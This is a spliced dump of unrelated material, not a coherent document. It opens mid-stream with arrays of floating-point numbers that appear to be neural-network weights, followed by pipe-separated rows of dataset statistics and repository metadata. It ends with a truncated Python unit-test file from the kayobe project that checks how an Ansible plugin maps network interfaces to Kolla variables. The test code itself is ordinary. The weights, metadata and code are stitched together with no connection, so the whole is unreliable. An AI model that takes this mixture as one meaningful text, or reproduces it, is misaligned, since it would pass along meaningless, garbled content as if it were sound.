-0.4207, -0.694, -0.75, 0.3696, -0.2426, -0.9707, 0.1426, -0.1437, -0.6465, -2.762, -0.3892, -3.01, -0.2073, -0.2764, -1.202, 0.335, -0.006256, -3.068], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -2.656, -0.11017, 4.184, 0.2502, -0.128, 0.1973, 0.4075, -3.084, -4.652, -0.5815, 0.1626, 0.587, -1.814, 0.7495, 0.001604, -0.9297, 1.611, 1.257, 2.285, -0.0398, 0.603, -1.18, 2.717, -3.959, -7.01, -0.1614, -3.77, 1.639, 0.4924, -0.0876, 0.7954, 2.475, -3.145, -3.824, -0.971, 0.378, 1.288, -4.01, 4.676, 0.327, -0.982, 3.084, -4.836, 5.28, -0.1758, -0.7544, -17.06, -0.421, -0.09436, 2.113], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.8457, -3.766, -2.963, -1.054, -1.779, 0.09174, -1.563, 0.3086, -0.8564, 0.4988, 0.1934, 0.1733, -2.012, 0.3203, -1.926, 0.415, 0.08936, -0.847, 0.607, 0.003368, -3.271, 0.4116, -0.962, -2.145, 0.5015, -1.242, 0.3616, -0.2152, -0.3877, -3.018, -7.555, -1.065, -1.22, 0.2617, 3.438, 1.025, 0.113, -0.3406, -0.7305, 0.011604, -0.626, 0.832, -1.565, -4.67, -0.559, -0.2266, -1.134, -0.4626, -1.119, 0.9062], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.007, -3.002, 2.414, -0.756, 1.959, 1.005, -0.1333, -2.207, -5.164, 0.7017, -0.7886, -0.3748, -4.113, 0.3801, -7.223, 0.011566, -0.1159, -1.306, 1.091, -1.232, -0.0281, 1.953, -0.4065, -1.619, -2.785, -2.393, -8.625, 1.492, 1.461, 0.1464, -1.346, 1.042, 0.299, -2.576, 2.49, -6.656, -0.3406, -1.214, -0.2057, 0.87, -2.342, 1.901, -0.5776, -1.298, -0.02687, 0.559, -1.236, 0.1609, 0.4592, -0.1675], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0495, 0.3804, 0.3115, -0.0403, 0.02666, -0.03198, 0.07043, 0.03345, 0.09235, 0.00758, -0.1399, 0.09454, 0.1534, -0.007385, -0.03726, 0.1995, -0.01718, -0.1278, 0.126, -0.1193, 0.0285, -0.1957, 0.2793, -0.01426, 0.00199, 0.2499, 0.0961, -0.01616, 0.00788, 0.0371, -0.361, -0.0525, 0.0973, -0.1815, -0.1403, 0.1699, 0.02742, -0.03824, 0.0928, 0.0234, 0.2805, -0.4749, 0.008514, -0.1748, -0.03732, 0.01152, 0.03674, 0.02138, -0.0788, 0.01924], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.007965, -1.738, 0.3022, 0.02736, -0.6685, 0.02704, 0.6206, 0.11316, -0.0451, 0.0761, -0.02774, -0.865, -0.05807, 0.014046, 0.0447, 0.1527, -0.01398, 0.02194, -0.1935, 0.3818, -0.01357, 0.07794, 0.3418, -3.92e-05, -0.3984, 0.1688, 0.2017, -0.05127, 0.001426, 0.06335, -0.206, -0.0441, -0.05096, -0.0487, 0.123, 0.161, -0.00801, -0.02887, 0.0714, 0.01729, -0.08514, -0.3164, -0.07446, -0.223, -0.01802, -0.0964, -1.158, 0.04443, 0.05316, -0.103], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.7104, 0.05896, 0.2004, -0.03006, 0.543, -0.192, 0.394, -0.1367, -0.08014, 0.288, -0.073, -0.005585, 0.2438, 0.05292, -0.3652, 0.3975, -0.4756, 0.1426, -0.01513, 0.2454, 0.1522, -0.07355, 0.1123, 0.02051, -0.072, -0.1335, 0.0518, 0.1731, 0.111, 0.01654, 0.01035, -0.4697, -0.0324, -0.01945, 0.10645, -0.354, 0.1437, -0.2382, 0.159, 0.069, 0.10864, 0.3518, -0.0642, 0.2688, 0.202, -0.0815, -0.003794, -0.4114, 0.01267, 0.5605], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.284, 0.2416, 0.02441, -0.02945, -0.454, 0.6123, 1.104, -0.09753, 0.07764, -0.014046, 0.05066, 1.109, 0.2693, 0.0704, -0.01642, 0.2256, -0.010635, 0.4287, 0.1372, -0.3057, -0.01985, 0.05893, -0.08795, 0.0662, 0.1874, 0.4976, -0.0167, -0.2336, 0.01277, 0.04758, -0.2817, -0.755, 0.03156, -0.4268, 0.0827, 1.457, 0.0695, -0.11725, 0.07947, -0.02132, 0.01253, -0.10785, -0.02391, -0.3152, -0.1719, 0.0487, -0.02745, 0.02934, -0.03253, -0.4146], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01146, 0.735, -0.05646, -0.1724, -0.4958, -0.01636, 0.672, -0.00163, -0.596, -0.04166, 0.0461, 1.102, 0.1028, -0.0658, 0.09045, -0.211, 0.1431, -0.2141, 0.297, -0.153, -0.005882, 0.3354, 0.02397, 0.0013685, 0.2485, -0.02065, -0.00655, -0.05887, 0.149, -0.4575, -0.349, 0.01489, 0.004498, 0.00244, 0.2712, -0.06232, -0.02129, 0.013725, 0.02344, -0.02019, -0.1438, -0.1063, -0.01944, -0.2886, 0.06183, -0.04633, -0.01216, -0.01569, -0.005486, 0.01933]]
[-0.430061, -0.0245742, -1.85737, -0.0138152, 0.419247, -0.213587, 0.16007, 0.741838, 0.00846945, -0.726034, -4.74206, 0.0694902, -0.33274, 0.458429, -1.03401, -0.436594, 0.0870681, -1.17479, 0.295038, 0.64818, 0.596977, -2.17556, -1.11059, -0.429719, 0.24184, 0.161132, 0.103251, 0.190621, -2.56281, 0.428494, 0.165919, -0.0413155, -3.21202, 0.0165723, -1.44951, -0.212717, 0.096362, -0.183611, -0.554534, 0.339886, 0.36664, 1.18725, -7.0066, 0.864816, -4.08665, 0.190657, 0.438984, -0.664789, -0.114347, 0.121706, -0.4302, -0.02457, -1.857, -0.01382, 0.4192, -0.2136, 0.16, 0.7417, 0.00847, -0.726, -4.742, 0.0695, -0.3328, 0.4585, -1.034, -0.4365, 0.0871, -1.175, 0.295, 0.648, 0.597, -2.176, -1.11, -0.4297, 0.2418, 0.1611, 0.1033, 0.1907, -2.562, 0.4285, 0.1659, -0.04132, -3.213, 0.01657, -1.449, -0.2128, 0.0964, -0.1836, -0.5547, 0.3398, 0.3667, 1.1875, -7.008, 0.8647, -4.086, 0.1907, 0.439, -0.6646, -0.1143, 0.1217]
Affine
[[-0.0010049, 0.0177588, 0.00644684, 0.0100598, 0.00215751, 0.0241695, 0.020716, 0.00325348, 0.0376957, 0.0537383, 0.00396667, 0.000295171, 0.00844118, 0.00430048, 5.53546e-05, 0.0270628, 0.00422983, -0.0169606, 0.00433998, 0.0567525, 0.0600247, 0.0347097, 0.00104634, 0.00925969, 0.0104904, -0.0627135, 0.0129801, 0.143107, 0.000155933, 0.00909701, 0.186967, 0.0109487, -0.0154135, 0.366418, -0.00464881, -0.0105615, 0.0346626, 0.0354153, -0.000777726, 0.0038574, 0.00419073, -0.0172908, 0.00628022, -0.0146312, 0.00526843, 0.0235743, 0.0181072, -0.00114841, 0.0116412, -0.00497452, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00160923, 0.0238133, 0.00746871, -0.0031306, -0.0028099, 0.022873, 0.0236429, 0.00820832, 0.0433519, 0.0518454, -0.000974907, -0.000245709, 0.00399484, -0.00809352, -0.00729084, 0.0195302, -0.00845971, -0.028078, 0.0022241, 0.0669689, 0.0556077, 0.0375405, 0.00812147, -0.0106021, 0.0140604, -0.0113678, 0.0248419, 0.174828, 0.0145279, 0.0100504, 0.201379, 0.0206927, -0.014034, 0.413943, -0.0112926, -0.00436394, 0.0329306, 0.0233757, 0.0294505, 0.0155092, -0.00207847, -0.0257482, 0.013277, -0.0134533, 0.00197653, 0.0245503, 0.0200014, -0.0515162, 0.011273, -0.00887692, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0317032, 0.0212332, -0.00498239, 0.0276194, 0.0203134, 0.0217319, 0.0120344, -0.0062876, 0.0411111, 0.0582644, 0.00941772, 0.0153711, 0.0289061, 0.0130497, 0.00292384, 0.0252006, -0.0102096, -0.012132, 0.0139771, 0.0693007, 0.0526067, 0.0374207, -0.00258324, -0.00697084, 0.00310848, -0.0135615, 0.0204092, 0.159073, 0.00164534, 0.0190926, 0.19954, 0.0133324, -0.0111085, 0.400429, -0.00365827, -0.0175431, 0.0316598, 0.0306686, -0.00118986, -0.0100581, 0.00221781, -0.0167647, -0.000780408, -0.0245084, 0.0207162, 0.0152769, 0.0214738, 0.00284946, 0.0194173, -0.00955315, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00386038, 0.0159409, 0.0125385, 0.00446224, -0.0279642, 0.0242819, 0.00800875, 0.0242513, -0.00429988, 0.0597856, -0.0114641, -0.0191129, 0.00406634, -0.0123403, -0.0165, 0.0248731, 0.0229474, -0.0287024, -0.0110197, 0.0460935, 0.0586005, 0.0364215, 0.0228337, 0.0147448, 0.0150308, -0.0141495, 0.0287788, 0.134752, 0.0210016, -0.0144816, 0.146935, 0.00479544, -0.019016, 0.198699, -0.009207, 0.0175599, 0.0421516, 0.0391117, 0.0313064, 0.0197998, -0.0245558, -0.0348254, 0.0142149, 0.0162112, -0.0102774, 0.0269725, 0.0188189, -0.0582468, -0.0100225, -0.0099651, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.032974, -0.00321035, -0.00730703, 0.0142817, 0.0309295, 0.0267673, 0.0229176, -0.022414, 0.00461009, 0.0524488, 0.0178036, 0.0293894, 0.0278019, 0.024519, 0.0120456, 0.034738, 0.0226422, 0.00185986, 0.0231078, 0.0506335, 0.0519765, 0.035548, -0.0209633, 0.00519522, -0.0129484, -0.0184528, -0.0054493, 0.0964997, -0.0113055, 0.0243227, 0.134838, 0.00860237, -0.0168496, 0.204973, 0.0131377, -0.0245341, 0.0375603, 0.0336533, 0.00147645, -0.0103691, 0.0188854, -0.00469537, -0.00316553, -0.038399, 0.0155334, 0.02367, 0.0162628, -0.00340823, 0.0212921, -0.00807586, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.001005, 0.01776, 0.006447, 0.01006, 0.002157, 0.02417, 0.02072, 0.003254, 0.0377, 0.05374, 0.003967, 0.0002952, 0.00844, 0.0043, 5.54e-05, 0.02707, 0.00423, -0.01697, 0.00434, 0.05676, 0.06003, 0.0347, 0.001046, 0.00926, 0.01049, -0.0627, 0.01298, 0.1431, 0.0001559, 0.009094, 0.187, 0.01095, -0.01541, 0.3665, -0.00465, -0.01056, 0.03467, 0.0354, -0.0007777, 0.003857, 0.004192, -0.01729, 0.00628, -0.01463, 0.00527, 0.02357, 0.01811, -0.001148, 0.01164, -0.004974], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.001609, 0.02382, 0.00747, -0.00313, -0.00281, 0.02287, 0.02364, 0.00821, 0.04337, 0.05185, -0.000975, -0.0002458, 0.003994, -0.008095, -0.00729, 0.01953, -0.00846, -0.02808, 0.002224, 0.06696, 0.0556, 0.03754, 0.00812, -0.010605, 0.01406, -0.01137, 0.02484, 0.1748, 0.01453, 0.01005, 0.2014, 0.02069, -0.01403, 0.414, -0.01129, -0.004364, 0.03293, 0.02338, 0.02945, 0.01551, -0.002079, -0.02574, 0.013275, -0.01345, 0.001976, 0.02455, 0.02, -0.0515, 0.01128, -0.00888], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0317, 0.02124, -0.004982, 0.02762, 0.02031, 0.02173, 0.01203, -0.006287, 0.0411, 0.05826, 0.009415, 0.01537, 0.0289, 0.01305, 0.002924, 0.0252, -0.01021, -0.01213, 0.01398, 0.0693, 0.0526, 0.0374, -0.002583, -0.00697, 0.003109, -0.013565, 0.02042, 0.159, 0.001645, 0.01909, 0.1996, 0.013336, -0.01111, 0.4004, -0.003658, -0.01755, 0.03165, 0.03067, -0.00119, -0.010056, 0.002218, -0.01677, -0.0007806, -0.0245, 0.02072, 0.015274, 0.02147, 0.00285, 0.01942, -0.00955], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00386, 0.01595, 0.012535, 0.004463, -0.02797, 0.02428, 0.00801, 0.02425, -0.0043, 0.05978, -0.01147, -0.01912, 0.004066, -0.01234, -0.0165, 0.02487, 0.02295, -0.0287, -0.01102, 0.04608, 0.0586, 0.0364, 0.02283, 0.01475, 0.01503, -0.01415, 0.02878, 0.1348, 0.021, -0.01448, 0.147, 0.004795, -0.01901, 0.1987, -0.00921, 0.01756, 0.04214, 0.03912, 0.0313, 0.0198, -0.02455, -0.03482, 0.01421, 0.0162, -0.01028, 0.02698, 0.01881, -0.05826, -0.010025, -0.009964], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.03296, -0.00321, -0.007305, 0.01428, 0.03093, 0.02676, 0.02292, -0.02242, 0.004612, 0.05246, 0.0178, 0.02939, 0.0278, 0.02452, 0.01205, 0.03473, 0.02264, 0.00186, 0.0231, 0.05063, 0.05197, 0.03555, -0.02097, 0.005196, -0.01295, -0.01845, -0.00545, 0.0965, -0.01131, 0.02432, 0.1349, 0.008606, -0.01685, 0.205, 0.01314, -0.02454, 0.03757, 0.03366, 0.001476, -0.01037, 0.01889, -0.004696, -0.003166, -0.0384, 0.01553, 0.02367, 0.01627, -0.003408, 0.02129, -0.00808]]
[-0.0102815, -0.0158668, -0.0154823, -0.015336, -0.0148281, -0.010284, -0.01587, -0.01548, -0.015335, -0.01483]
| 17,438.863636
| 73,674
| 0.553836
| 104,237
| 383,655
| 2.038451
| 0.180617
| 0.479579
| 0.712154
| 0.940051
| 0.243192
| 0.243098
| 0.243098
| 0.243098
| 0.243098
| 0.243098
| 0
| 0.640777
| 0.135843
| 383,655
| 21
| 73,675
| 18,269.285714
| 0.000121
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
43ec63d8644e06a36d77352d2678224a18955546
| 14,895
|
py
|
Python
|
kayobe/tests/unit/plugins/action/test_kolla_ansible_host_vars.py
|
G-Research/kayobe
|
80c13e75deb4bff94c5bfe2fd79bb9beecb71873
|
[
"Apache-2.0"
] | 48
|
2018-03-08T13:34:34.000Z
|
2022-03-14T15:42:20.000Z
|
kayobe/tests/unit/plugins/action/test_kolla_ansible_host_vars.py
|
chazzrobbz/kayobe
|
5fb6362e2548afdc2ea824678e565ef81cdbcaa5
|
[
"Apache-2.0"
] | null | null | null |
kayobe/tests/unit/plugins/action/test_kolla_ansible_host_vars.py
|
chazzrobbz/kayobe
|
5fb6362e2548afdc2ea824678e565ef81cdbcaa5
|
[
"Apache-2.0"
] | 25
|
2018-04-23T07:51:31.000Z
|
2022-03-14T15:42:22.000Z
|
# Copyright (c) 2020 StackHPC Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import unittest
import jinja2
from kayobe.plugins.action import kolla_ansible_host_vars
@jinja2.contextfilter
def _net_interface(context, name):
return context.get(name + '_interface')
@jinja2.contextfilter
def _net_vlan(context, name):
return context.get(name + '_vlan')
@jinja2.contextfilter
def _net_select_bridges(context, names):
return [name for name in names
if (_net_interface(context, name) or "").startswith("br")]
class FakeTemplar(object):
def __init__(self, variables):
self.variables = variables
self.env = jinja2.Environment()
self.env.filters['net_interface'] = _net_interface
self.env.filters['net_vlan'] = _net_vlan
self.env.filters['net_select_bridges'] = _net_select_bridges
def template(self, string):
template = self.env.from_string(string)
result = template.render(**self.variables)
return {
"None": None,
"True": True,
"False": False,
}.get(result, result)
class TestCase(unittest.TestCase):
variables = {
"network_interfaces": [
"foo",
"bar",
],
"foo_interface": "eth0",
"foo_vlan": 1,
"bar_interface": "eth1",
"bar_vlan": 2,
"network_bridge_suffix_ovs": "-ovs",
"network_patch_prefix": "p-",
"network_patch_suffix_ovs": "-ovs",
}
def _create_module(self, variables=None):
if not variables:
variables = self.variables
templar = FakeTemplar(variables)
return kolla_ansible_host_vars.ActionModule(None, None, None, None,
templar, None)
def test__run_empty_args(self):
module = self._create_module()
result = module._run([], [])
expected = {
"changed": False,
"ansible_facts": {},
"_ansible_facts_cacheable": False,
}
self.assertEqual(expected, result)
def test__run_one_interface(self):
module = self._create_module()
interfaces = [{
"var_name": "kolla_foo_interface",
"network": "foo",
"description": "Foo network",
"required": False,
}]
result = module._run(interfaces, [])
expected = {
"changed": False,
"ansible_facts": {
"kolla_foo_interface": "eth0",
},
"_ansible_facts_cacheable": False,
}
self.assertEqual(expected, result)
def test__run_two_interfaces(self):
module = self._create_module()
interfaces = [{
"var_name": "kolla_foo_interface",
"network": "foo",
"description": "Foo network",
"required": False,
}, {
"var_name": "kolla_bar_interface",
"network": "bar",
"description": "Bar network",
"required": False,
}]
result = module._run(interfaces, [])
expected = {
"changed": False,
"ansible_facts": {
"kolla_foo_interface": "eth0",
"kolla_bar_interface": "eth1",
},
"_ansible_facts_cacheable": False,
}
self.assertEqual(expected, result)
def test__run_one_with_dashes(self):
variables = copy.deepcopy(self.variables)
variables["foo_interface"] = "eth-0"
module = self._create_module(variables)
interfaces = [{
"var_name": "kolla_foo_interface",
"network": "foo",
"description": "Foo network",
"required": False,
}]
result = module._run(interfaces, [])
expected = {
"changed": False,
"ansible_facts": {
"kolla_foo_interface": "eth_0",
},
"_ansible_facts_cacheable": False,
}
self.assertEqual(expected, result)
def test__run_interface_not_mapped(self):
module = self._create_module()
interfaces = [{
"var_name": "kolla_baz_interface",
"network": "baz",
"description": "Baz network",
"required": True,
}]
result = module._run(interfaces, [])
expected = {
"changed": False,
"failed": True,
"msg": ("Required network 'baz' (Baz network) is not mapped to "
"this host"),
}
self.assertEqual(expected, result)
def test__run_interface_not_mapped_not_required(self):
module = self._create_module()
interfaces = [{
"var_name": "kolla_baz_interface",
"network": "baz",
"description": "Baz network",
"required": False,
}]
result = module._run(interfaces, [])
expected = {
"changed": False,
"ansible_facts": {},
"_ansible_facts_cacheable": False,
}
self.assertEqual(expected, result)
def test__run_interface_no_interface(self):
variables = copy.deepcopy(self.variables)
del variables["bar_interface"]
module = self._create_module(variables)
interfaces = [{
"var_name": "kolla_bar_interface",
"network": "bar",
"description": "Bar network",
"required": True,
}]
result = module._run(interfaces, [])
expected = {
"changed": False,
"failed": True,
"msg": ("Required network 'bar' (Bar network) does not have an "
"interface configured for this host"),
}
self.assertEqual(expected, result)
def test__run_interface_no_interface_not_required(self):
variables = copy.deepcopy(self.variables)
del variables["bar_interface"]
module = self._create_module(variables)
interfaces = [{
"var_name": "kolla_bar_interface",
"network": "bar",
"description": "Bar network",
"required": False,
}]
result = module._run(interfaces, [])
expected = {
"changed": False,
"ansible_facts": {},
"_ansible_facts_cacheable": False,
}
self.assertEqual(expected, result)
def test__run_interface_no_interface_not_mapped(self):
variables = copy.deepcopy(self.variables)
del variables["bar_interface"]
module = self._create_module(variables)
interfaces = [{
"var_name": "kolla_bar_interface",
"network": "bar",
"description": "Bar network",
"required": True,
}, {
"var_name": "kolla_baz_interface",
"network": "baz",
"description": "Baz network",
"required": True,
}]
result = module._run(interfaces, [])
expected = {
"changed": False,
"failed": True,
"msg": ("Required network 'bar' (Bar network) does not have an "
"interface configured for this host; Required network "
"'baz' (Baz network) is not mapped to this host"),
}
self.assertEqual(expected, result)
def test_run_external_networks_one(self):
module = self._create_module()
external_networks = [{
"network": "foo",
"required": False,
}]
result = module._run([], external_networks)
expected = {
"changed": False,
"ansible_facts": {
"kolla_neutron_bridge_names": "eth0-ovs",
"kolla_neutron_external_interfaces": "eth0",
},
"_ansible_facts_cacheable": False,
}
self.assertEqual(expected, result)
def test_run_external_networks_two(self):
module = self._create_module()
external_networks = [{
"network": "foo",
"required": False,
}, {
"network": "bar",
"required": False,
}]
result = module._run([], external_networks)
expected = {
"changed": False,
"ansible_facts": {
"kolla_neutron_bridge_names": "eth0-ovs,eth1-ovs",
"kolla_neutron_external_interfaces": "eth0,eth1",
},
"_ansible_facts_cacheable": False,
}
self.assertEqual(expected, result)
def test_run_external_networks_two_same_interface(self):
variables = copy.deepcopy(self.variables)
variables["bar_interface"] = "eth0"
module = self._create_module(variables)
external_networks = [{
"network": "foo",
"required": False,
}, {
"network": "bar",
"required": False,
}]
result = module._run([], external_networks)
expected = {
"changed": False,
"ansible_facts": {
"kolla_neutron_bridge_names": "eth0-ovs",
"kolla_neutron_external_interfaces": "eth0",
},
"_ansible_facts_cacheable": False,
}
self.assertEqual(expected, result)
def test_run_external_networks_two_vlans(self):
variables = copy.deepcopy(self.variables)
variables["foo_interface"] = "eth0.1"
variables["bar_interface"] = "eth0.2"
module = self._create_module(variables)
external_networks = [{
"network": "foo",
"required": False,
}, {
"network": "bar",
"required": False,
}]
result = module._run([], external_networks)
expected = {
"changed": False,
"ansible_facts": {
"kolla_neutron_bridge_names": "eth0-ovs",
"kolla_neutron_external_interfaces": "eth0",
},
"_ansible_facts_cacheable": False,
}
self.assertEqual(expected, result)
def test_run_external_networks_bridge(self):
variables = copy.deepcopy(self.variables)
variables["foo_interface"] = "breth0"
module = self._create_module(variables)
external_networks = [{
"network": "foo",
"required": False,
}]
result = module._run([], external_networks)
expected = {
"changed": False,
